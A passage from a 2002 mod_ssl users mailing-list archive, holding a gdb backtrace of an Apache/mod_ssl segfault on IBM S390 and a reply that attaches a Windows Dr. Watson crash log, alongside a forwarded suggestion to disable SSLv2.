  on IBM S390, the httpd crashed. Here are some debug =
information.=20
  
Any help will be great =
appreciated. 

  
/usr/local/apache_ssl/bin # gdb =
httpd=20
  
GNU gdb 5.2.1 
Copyright 2002 Free Software Foundation, Inc. =

GDB is free software, covered by the GNU General =
Public=20
  License, and you are 
welcome to =
change it=20
  and/or distribute copies of it under certain conditions. =

Type "show copying" to see the =
conditions. 
There is absolutely no warranty for GDB.  =
Type "show=20
  warranty" for details. 
This GDB =
was=20
  configured as "s390-ibm-linux"... 
(gdb) run=20
  -X -DSSL 
Starting program:=20
  /usr/local/apache_ssl/bin/httpd -X -DSSL 

  
Program received signal SIGSEGV, =
Segmentation=20
  fault. 
0x004457de in ap_ctx_get =

  (ctx=3D0x90bff02c, key=3D0x4034b284 "ssl_module") at =
ap_ctx.c:125 
125         for (i =3D=20
  0; ctx->cr_entry[i] !=3D NULL; i++) 
(gdb)=20
  p ctx 
$1 =3D (struct {...} *)=20
  0x90bff02c 
(gdb) up =

#1  0x40299d70 in ssl_config_global_create =
() at=20
  ssl_engine_config.c:119 
119         mc =3D=20
  ap_ctx_get(ap_global_ctx, "ssl_module"); 
(gdb) p ap_global_ctx 
$2 =3D (struct=20
  {...} *) 0x4984e8 
(gdb) p=20
  *ap_global_ctx 
$3 =3D {cr_pool =
=3D 0x0,=20
  cr_entry =3D 0x4984f8} 
(gdb) =
down=20
  
#0  0x004457de in ap_ctx_get =
(ctx=3D0x90bff02c,=20
  key=3D0x4034b284 "ssl_module") at ap_ctx.c:125 
125         for (i =
=3D 0;=20
  ctx->cr_entry[i] !=3D NULL; i++) 
(gdb) p=20
  *ctx 
Cannot access memory at =
address=20
  0x90bff02c 
(gdb) where =

#0  0x004457de in ap_ctx_get =
(ctx=3D0x90bff02c,=20
  key=3D0x4034b284 "ssl_module") at ap_ctx.c:125 
#1  0x40299d70 in ssl_config_global_create () at=20
  ssl_engine_config.c:119 
#2  0x40299fde=20
  in ssl_config_server_create (p=3D0x48f118, s=3D0x48f140) at=20
  ssl_engine_config.c:193 
#3  0x00413a34=20
  in ap_single_module_configure (p=3D0x48f118, s=3D0x48f140, =
m=3D0x403660b0)=20
  
    at =
http_config.c:1691=20
  
#4  0x0040931e in load_module=20
  (cmd=3D0x7ffff608, dummy=3D0x0, modname=3D0x49cde8 =
"ssl_module", 
    filename=3D0x49cdf8 =
"libexec/libssl.so") at=20
  mod_so.c:307 
#5  =
0x0041161e in=20
  invoke_cmd (cmd=3D0x4764c8, parms=3D0x7ffff608, mconfig=3D0x0, =
args=3D0x7fffd5b7=20
  "") 
    at=20
  http_config.c:869 
#6  =
0x004122ca in=20
  ap_handle_command (parms=3D0x7ffff608, config=3D0x48f670, =

    l=3D0x7fffd588 "LoadModule=20
  ssl_module         =
libexec/libssl.so")=20
  at http_config.c:1080 
#7  =
0x00412380=20
  in ap_srm_command_loop (parms=3D0x7ffff608, config=3D0x48f670) at=20
  http_config.c:1094 
#8  =
0x00412d64 in=20
  ap_process_resource_config (s=3D0x48f140, 
    fname=3D0x490820=20
  "/usr/local/apache_ssl/conf/httpd.conf", p=3D0x48f118, =
ptemp=3D0x493148)=20
  
    at =
http_config.c:1382=20
  
#9  0x0041396e in ap_read_config =
(p=3D0x48f118,=20
  ptemp=3D0x493148, confname=3D0x487a88 "conf/httpd.conf") =

    at http_config.c:1674 =

#10 0x00422ef8 in main (argc=3D3, =
argv=3D0x7ffff8b4) at=20
  http_main.c:5531 


  
   =20
  _/_/_/_/  =
_/   Steve Bao =

   =
_/      =20
  _/_/   Computer=20
  Associates 
  _/      _/  _/   =

 _/     _/_/_/_/   Tel: (858) 625-6964 =

_/_/_/_/      _/   Fax: (858) 453-2816=20





------_=_NextPart_001_01C2715C.CB232802--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 12 08:14:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA18765; Sat, 12 Oct 2002 08:13:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA18747; Sat, 12 Oct 2002 08:13:01 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 64DA44CE771; Sat, 12 Oct 2002 08:13:00 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3DF42286D6; Sat, 12 Oct 2002 08:12:21 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivexgw1.intruvert.com id EAA13747; Sat, 12 Oct 2002 04:22:04 +0200 (MET DST)
Received: by ivexgw.intruvert.com with Internet Mail Service (5.5.2656.59)
	id <44WJFDZ2>; Fri, 11 Oct 2002 19:21:57 -0700
Message-ID: 
From: Ramakrishna Kuppa 
To: "'hunter'" , modssl-users@modssl.org
Cc: Edwin Cleton 
Subject: RE: [Fwd: Sol: Re: Apache.exe generates errors and is closed by W
	indows.]
Date: Fri, 11 Oct 2002 19:21:56 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_000_01C27196.22F77130"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ramakrishna Kuppa 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C27196.22F77130
Content-Type: text/plain

Attached here is the error log Win2K created. Hope somebody can make sense
out of it and diagnose the problem suitably.

----------------------------------------------------------------------------
-----
Ramakrishna Kuppa		| October 2002
Ph: 408 434 8339		| Ashwayuja Chitrabhanu 5104
http://www.intruvert.com

> -----Original Message-----
> From: hunter [mailto:theantigod@sympatico.ca] 
> Sent: Wednesday, October 02, 2002 5:17 AM
> To: Ramakrishna Kuppa; modssl-users@modssl.org
> Cc: Edwin Cleton
> Subject: [Fwd: Sol: Re: Apache.exe generates errors and is 
> closed by Windows.]
> 
> 
> Ramakrishna,
> 
> The following note was sent to me personally.  I cannot 
> confirm it by my 
> own experience, but it is worth considering.  The suggestion 
> is that you 
> can still have this problem with the newer code.  This offers a 
> potential solution.
> 
> Other comments are welcome.
> 
> Thanks Edwin.
> 
> -Chris.
> 
> 
> Original message from Edwin Cleton
> Hunter,
> 
> This is caused with versions where SSLv2 is still active. 
> apache 1.3.26, mod_ssl 2.8.10 and openssl 0.9.6g, win32.
> 
> SSLv2 MUST be disabled because the problem is not 100% solved between 
> 0.9.6d and the current 0.9.6g with the win32 platform.
> 
> Fwd to List: apache-modssl if you consider this to be of 
> public interest.
> 
> Sincerely, Edwin Cleton
> 
> 
> 


------_=_NextPart_000_01C27196.22F77130
Content-Type: text/plain;
	name="ApacheWatsonError.txt"
Content-Disposition: attachment;
	filename="ApacheWatsonError.txt"
Content-Transfer-Encoding: quoted-printable

Application exception occurred:
        App:  (pid=3D1956)
        When: 10/11/2002 @ 15:33:42.490
        Exception number: c0000005 (access violation)

*----> System Information <----*
        Computer Name: INTRUVER-W662ID
        User Name: SYSTEM
        Number of Processors: 1
        Processor Type: x86 Family 6 Model 11 Stepping 1
        Windows 2000 Version: 5.0
        Current Build: 2195
        Service Pack: 2
        Current Type: Uniprocessor Free
        Registered Organization: intruvert networks
        Registered Owner: qa

*----> Task List <----*
   0 Idle.exe
   8 System.exe
 144 SMSS.exe
 168 CSRSS.exe
 188 WINLOGON.exe
 216 SERVICES.exe
 228 LSASS.exe
 416 svchost.exe
 444 spoolsv.exe
 476 svchost.exe
 532 mnmsrvc.exe
 616 regsvc.exe
 640 mstask.exe
 676 WinMgmt.exe
 724 mspmspsv.exe
1480 explorer.exe
1796 sistray.exe
1804 khooker.exe
1816 mixer.exe
1744 taskmgr.exe
 588 mysqld-max-nt.e.exe
1976 Apache.exe
1956 Apache.exe
1972 CMD.exe
 596 rotatelogs.exe
1264 ismgr.exe
1932 CMD.exe
1452 CMD.exe
1528 rotatelogs.exe
1752 CMD.exe
1736 java.exe
1704 rotatelogs.exe
1676 CMD.exe
1660 rotatelogs.exe
 212 CMD.exe
1256 CMD.exe
1680 rotatelogs.exe
1276 rotatelogs.exe
 852 javaw.exe
2556 IEXPLORE.exe
2072 DRWTSN32.exe
   0 _Total.exe

(00400000 - 00405000)=20
(77F80000 - 77FFB000)=20
(6FF60000 - 6FFB9000)=20
(77E80000 - 77F35000)=20
(77E10000 - 77E74000)=20
(77F40000 - 77F7C000)=20
(77DB0000 - 77E0C000)=20
(77D40000 - 77DB0000)=20
(75030000 - 75043000)=20
(78000000 - 78046000)=20
(75020000 - 75028000)=20
(1C0F0000 - 1C0F5000)=20
(6FE60000 - 6FE6B000)=20
(10000000 - 1001E000)=20
(00630000 - 00656000)=20
(00660000 - 0070A000)=20
(75050000 - 75058000)=20
(00710000 - 0072E000)=20
(785C0000 - 785CC000)=20
(77980000 - 779A4000)=20
(77340000 - 77353000)=20
(77520000 - 77525000)=20
(77320000 - 77337000)=20
(75150000 - 75160000)=20
(75170000 - 751BF000)=20
(77BE0000 - 77BEF000)=20
(751C0000 - 751C6000)=20
(77950000 - 7797A000)=20
(77A50000 - 77B46000)=20
(779B0000 - 77A4B000)=20
(773B0000 - 773DE000)=20
(77380000 - 773A2000)=20
(77830000 - 7783E000)=20
(77880000 - 7790D000)=20
(77C10000 - 77C6E000)=20
(774E0000 - 77512000)=20
(774C0000 - 774D1000)=20
(77530000 - 77552000)=20
(71780000 - 7180A000)=20
(70BD0000 - 70C34000)=20
(77360000 - 77379000)=20
(775A0000 - 77625000)=20
(777E0000 - 777E8000)=20
(777F0000 - 777F5000)=20
(7CA00000 - 7CA23000)=20
(77440000 - 774B5000)=20
(77430000 - 77440000)=20
(74FD0000 - 74FEF000)=20
(75010000 - 75017000)=20

State Dump for Thread Id 0x368

eax=3D0000000c ebx=3D77f827dd ecx=3D0012fd88 edx=3D00000000 =
esi=3D00000000 edi=3D00000001
eip=3D77f827e8 esp=3D0012fb10 ebp=3D0012fb48 iopl=3D0         nv up ei =
ng nz na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000286


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:00bad0e3=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00bad35a=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0012FB48 74FD1815 00000270 00000008 00000001 00000004 =
ntdll!NtWaitForSingleObject=20
0012FC34 75032006 0000000D 0012FD88 00000000 00000000 msafd! =

0012FC98 6FF6BFE4 0000000D 0012FD88 00000000 00000000 ws2_32!select=20
0012FEC8 6FF6E46F 00000000 00000000 7FFDF000 0012FF40 !ap_start_restart =

0012FF40 0040100F 00000009 005136F0 00401109 00000009 !apache_main=20
0012FFC0 77E8D326 00000000 00000000 7FFDF000 00000000 !=20
0012FFF0 00000000 00401026 00000000 000000C8 00000100 =
kernel32!CreateProcessW=20

*----> Raw Stack Dump <----*
0012fb10  d5 16 fd 74 70 02 00 00 - 01 00 00 00 34 fb 12 00  =
...tp.......4...
0012fb20  88 fd 12 00 bc fb 12 00 - ac fb 12 00 00 00 00 00  =
................
0012fb30  00 00 00 00 c0 b4 b3 ff - ff ff ff ff 70 54 14 00  =
............pT..
0012fb40  00 00 00 00 00 00 00 00 - 34 fc 12 00 15 18 fd 74  =
........4......t
0012fb50  70 02 00 00 08 00 00 00 - 01 00 00 00 04 00 00 00  =
p...............
0012fb60  00 00 00 00 98 54 14 00 - 00 00 00 00 00 00 00 00  =
.....T..........
0012fb70  00 00 00 00 80 69 67 ff - ff ff ff ff 00 00 00 00  =
.....ig.........
0012fb80  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  =
................
0012fb90  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  =
................
0012fba0  00 00 00 00 00 00 00 00 - 00 00 00 00 80 69 67 ff  =
.............ig.
0012fbb0  ff ff ff ff 02 00 00 00 - 00 00 00 00 08 00 00 00  =
................
0012fbc0  19 00 00 00 00 00 00 00 - 0c 00 00 00 19 00 00 00  =
................
0012fbd0  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  =
................
0012fbe0  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 51 00  =
..............Q.
0012fbf0  70 54 14 00 00 00 00 00 - 00 00 00 00 ac fb 12 00  =
pT..............
0012fc00  38 00 00 00 02 00 00 00 - 00 00 00 00 00 00 00 00  =
8...............
0012fc10  38 05 00 00 64 f9 12 00 - d4 fb 12 00 60 fb 12 00  =
8...d.......`...
0012fc20  68 fc 12 00 88 fc 12 00 - 05 e6 fd 74 00 14 fd 74  =
h..........t...t
0012fc30  ff ff ff ff 98 fc 12 00 - 06 20 03 75 0d 00 00 00  ......... =
.u....
0012fc40  88 fd 12 00 00 00 00 00 - 00 00 00 00 a4 fe 12 00  =
................

State Dump for Thread Id 0x66c

eax=3D778321fe ebx=3D00000004 ecx=3Dffffffff edx=3D00000000 =
esi=3D77f8281e edi=3D00000004
eip=3D77f82829 esp=3D00d6fd24 ebp=3D00d6fd70 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForMultipleObjects
        77f8281e b8e9000000       mov     eax,0xe9
        77f82823 8d542404         lea     edx,[esp+0x4]          =
ss:017ed2f7=3D????????
        77f82827 cd2e             int     2e
        77f82829 c21400           ret     0x14

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
00D6FD70 77E969C6 00D6FD48 00000001 00000000 00000000 =
ntdll!NtWaitForMultipleObjects=20
00D6FFB4 77E96523 00000005 00000000 000B000A 00153D38 =
kernel32!WaitForMultipleObjects=20
00D6FFEC 00000000 778321FE 00153D38 00000000 000000C8 =
kernel32!TlsSetValue=20

*----> Raw Stack Dump <----*
00d6fd24  c2 3c e8 77 04 00 00 00 - 48 fd d6 00 01 00 00 00  =
.<.w....H.......
00d6fd34  00 00 00 00 00 00 00 00 - 01 00 00 00 38 3d 15 00  =
............8=3D..
00d6fd44  01 00 00 00 34 01 00 00 - 38 01 00 00 48 01 00 00  =
....4...8...H...
00d6fd54  b8 01 00 00 00 00 00 00 - 00 00 00 00 e8 c3 dc 85  =
................
00d6fd64  04 00 00 00 01 00 00 00 - c0 c3 dc 85 b4 ff d6 00  =
................
00d6fd74  c6 69 e9 77 48 fd d6 00 - 01 00 00 00 00 00 00 00  =
.i.wH...........
00d6fd84  00 00 00 00 00 00 00 00 - b2 22 83 77 04 00 00 00  =
.........".w....
00d6fd94  b0 fe d6 00 00 00 00 00 - ff ff ff ff 38 3d 15 00  =
............8=3D..
00d6fda4  0a 00 0b 00 00 00 00 00 - 42 fb 44 80 f8 34 d8 e1  =
........B.D..4..
00d6fdb4  01 f8 44 80 00 00 00 00 - 01 00 00 00 38 00 00 00  =
..D.........8...
00d6fdc4  23 00 00 00 23 00 00 00 - 00 00 00 00 0a 00 0b 00  =
#...#...........
00d6fdd4  38 3d 15 00 74 00 00 00 - ff ff ff ff fe 21 83 77  =
8=3D..t........!.w
00d6fde4  bf 73 f8 77 cb 64 e9 77 - 1b 00 00 00 00 02 00 00  =
.s.w.d.w........
00d6fdf4  fc ff d6 00 23 00 00 00 - 0c 0b 59 bb 04 00 00 00  =
....#.....Y.....
00d6fe04  62 f3 40 80 98 00 00 00 - 05 00 00 00 24 00 01 e1  =
b.@.........$...
00d6fe14  74 0b 59 bb 6b 04 45 80 - 48 a5 c1 85 00 00 00 00  =
t.Y.k.E.H.......
00d6fe24  05 00 00 00 00 00 00 00 - 05 00 00 00 fe ff f8 00  =
................
00d6fe34  d8 a5 c1 85 48 b8 22 e2 - 49 03 00 00 48 b8 22 e2  =
....H.".I...H.".
00d6fe44  e8 84 00 e1 64 0b 59 bb - 90 f7 dc 85 b4 0b 59 bb  =
....d.Y.......Y.
00d6fe54  d0 0c 45 80 34 00 00 c0 - 20 c2 dc 85 71 36 4a 80  ..E.4... =
...q6J.

State Dump for Thread Id 0x2c8

eax=3D00000000 ebx=3D00000000 ecx=3D00000f86 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D00e7fee4 ebp=3D00e7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:018fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7e558=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
00E7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
00E7FF78 6FF6B62A 00000000 780060CE 00000000 0012FFB0 =
kernel32!WaitForSingleObject=20
00E7FFB4 77E96523 005A55D8 0012FFB0 0012FFB0 005A55D8 !ap_start_restart =

00E7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x4b4

eax=3D00000000 ebx=3D77f827dd ecx=3D0000003e edx=3D00000000 =
esi=3D00000000 edi=3D00000001
eip=3D77f827e8 esp=3D00f7db30 ebp=3D00f7db68 iopl=3D0         nv up ei =
ng nz na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000286


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:019fb103=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d610=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
00F7DB68 74FD1815 00000364 00000450 00000001 00000004 =
ntdll!NtWaitForSingleObject=20
00F7DC54 75032006 00000040 00F7DCF4 00000000 00000000 msafd! =

00F7DCB8 6FF63280 00000040 00F7DCF4 00000000 00000000 ws2_32!select=20
00001000 00000000 00000000 00000000 00000000 00000000 =
!ap_recvwithtimeout=20

*----> Raw Stack Dump <----*
00f7db30  d5 16 fd 74 64 03 00 00 - 01 00 00 00 54 db f7 00  =
...td.......T...
00f7db40  f4 dc f7 00 dc db f7 00 - cc db f7 00 00 02 00 00  =
................
00f7db50  00 00 00 00 c0 b4 b3 ff - ff ff ff ff 70 79 14 00  =
............py..
00f7db60  00 00 00 00 00 00 00 00 - 54 dc f7 00 15 18 fd 74  =
........T......t
00f7db70  64 03 00 00 50 04 00 00 - 01 00 00 00 04 00 00 00  =
d...P...........
00f7db80  00 00 00 00 58 bc 14 00 - 00 00 00 00 00 00 00 00  =
....X...........
00f7db90  00 00 00 00 80 2e 0f f7 - ff ff ff ff bc db f7 00  =
................
00f7dba0  00 00 00 00 00 00 00 00 - e1 01 00 00 05 4a 08 04  =
.............J..
00f7dbb0  05 4a 08 04 07 0f 68 00 - a0 05 00 00 64 00 00 00  =
.J....h.....d...
00f7dbc0  34 de f7 00 00 00 00 00 - 00 00 00 00 80 2e 0f f7  =
4...............
00f7dbd0  ff ff ff ff 01 00 00 00 - 00 de f7 00 50 04 00 00  =
............P...
00f7dbe0  19 00 00 00 76 2b fd 74 - 50 04 00 00 64 03 00 00  =
....v+.tP...d...
00f7dbf0  00 00 00 00 00 00 00 00 - 40 dc f7 00 17 20 01 00  =
........@.... ..
00f7dc00  30 dc f7 00 10 00 00 00 - 10 2c fd 74 a3 00 00 c0  =
0........,.t....
00f7dc10  70 79 14 00 58 bc 14 00 - 00 00 00 00 cc db f7 00  =
py..X...........
00f7dc20  2c 00 00 00 01 00 00 00 - 00 00 00 00 00 00 00 00  =
,...............
00f7dc30  ac dc f7 00 01 00 00 00 - e8 db f7 00 80 db f7 00  =
................
00f7dc40  88 dc f7 00 a8 dc f7 00 - 05 e6 fd 74 00 14 fd 74  =
...........t...t
00f7dc50  ff ff ff ff b8 dc f7 00 - 06 20 03 75 40 00 00 00  ......... =
.u@...
00f7dc60  f4 dc f7 00 00 00 00 00 - 00 00 00 00 ec dc f7 00  =
................

State Dump for Thread Id 0x514

eax=3D00000000 ebx=3D00000000 ecx=3Dffffffe6 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0107fee4 ebp=3D0107ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:01afd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5b8=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0107FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0107FF78 6FF6B62A 00000002 780060CE 00000002 0012FFB0 =
kernel32!WaitForSingleObject=20
0107FFB4 77E96523 005A56E8 0012FFB0 0012FFB0 005A56E8 !ap_start_restart =

0107FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x600

eax=3D00000000 ebx=3D00000000 ecx=3Dfffffff9 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0117fee4 ebp=3D0117ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:01bfd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5cb=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0117FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0117FF78 6FF6B62A 00000003 780060CE 00000003 0012FFB0 =
kernel32!WaitForSingleObject=20
0117FFB4 77E96523 005A5770 0012FFB0 0012FFB0 005A5770 !ap_start_restart =

0117FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x4f4

eax=3D00000000 ebx=3D00000000 ecx=3D00000f1e edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0127fee4 ebp=3D0127ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:01cfd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7e4f0=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0127FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0127FF78 6FF6B62A 00000004 780060CE 00000004 0012FFB0 =
kernel32!WaitForSingleObject=20
0127FFB4 77E96523 005A57F8 0012FFB0 0012FFB0 005A57F8 !ap_start_restart =

0127FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x504

eax=3D6ff80090 ebx=3D00000000 ecx=3D040d1040 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0137fee4 ebp=3D0137ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:01dfd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:04b4e612=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0137FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0137FF78 6FF6B62A 00000005 780060CE 00000005 0012FFB0 =
kernel32!WaitForSingleObject=20
0137FFB4 77E96523 005A5880 0012FFB0 0012FFB0 005A5880 !ap_start_restart =

0137FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x4e0

eax=3D04037c98 ebx=3D00000000 ecx=3D0147f97c edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0147fee4 ebp=3D0147ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:01efd4b7=3D????????
